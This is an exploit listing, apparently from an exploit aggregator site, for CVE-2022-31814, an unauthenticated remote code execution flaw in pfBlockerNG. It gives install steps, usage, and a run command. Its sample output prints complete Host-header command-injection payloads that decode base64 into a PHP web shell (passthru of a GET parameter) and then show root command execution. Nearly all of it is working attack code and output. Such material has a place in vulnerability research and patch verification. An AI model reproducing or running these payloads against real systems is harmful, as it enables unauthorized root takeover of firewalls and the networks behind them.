Share
## https://sploitus.com/exploit?id=0DDD5D92-AFF8-5C31-B4CA-B0DBABF2537B
# CVE-2022-31814

Updated Exploit - pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)


## Description

This script is a proof-of-concept exploit for pfBlockerNG <= 2.1.4_26 that allows for remote code execution. It takes a single target URL or a list of URLs, tries to upload a shell using multiple payloads, executes a command, and then deletes the shell.


## Requirements

This script requires Python 3.x and the request module to be installed. You can install these modules by running:

```bash
pip3 install requests
```

or

```bash
pip3 install -r requirements.txt
```

## Usage 

```bash
usage: CVE-2022-31814.py [-h] --url URL

pfBlockerNG <= 2.1.4_26 Unauth RCE

options:
  -h, --help  show this help message and exit
  --url URL   Full URL and port e.g.: https://10.10.10.10:443/
```

## Exploit Execution


```bash
python3 CVE-2022-31814.py --url "https://10.10.10.10:443/"
```

## Output

```
[+] pfBlockerNG is installed
[/] Uploading shell...
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python2 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python3 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python2 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python3.8 -m base64 -d | php; '"}
[+] Upload succeeded
# id 
uid=0(root) gid=0(wheel) groups=0(wheel)

# whoami
root

# ^C[+] Shell deleted
```